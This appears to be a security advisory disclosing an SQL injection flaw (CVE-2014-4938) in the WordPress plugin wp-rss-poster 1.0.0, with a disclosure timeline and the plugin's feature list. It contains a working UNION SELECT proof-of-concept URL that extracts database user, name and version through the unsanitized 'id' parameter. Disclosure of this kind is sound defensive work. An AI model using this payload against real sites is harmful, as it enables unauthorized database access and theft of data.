wp-plugin : wp-rss-poster – A1-Injection


Plugin Details


Plugin Name : wp-rss-poster


Effected Version : 1.0.0 (and most probably lower version's if any)

Vulnerability : A1-Injection
Identified by : Anant Shrivastava



Technical Details


Minimum Level of Access Required : Unauthenticated


PoC - (Proof of Concept) :


http://localhost/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18

Here the parameter “id” is susceptible. The root cause is the usage of client input $_GET[‘id’] directly in the plugin.


Disclosure Timeline


Vendor Contacted : 2013-12-23

Plugin Status : Closed
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4938

Plugin Description :
**Main Features:**

1. Easy to create post from multiple rss sources.
2. Specify post categories, author, publish date.
3. Customize formats using flexible post templates.
4. Unix cron and WP internal cron jobs for feed update.
5. Cache images on the WordPress Media Library.
6. Twitter and facebook support.

**More info:**

* Find out more great [WordPress plugins](http://plugins.wp-coder.net/)

Leave a Reply

Your email address will not be published. Required fields are marked *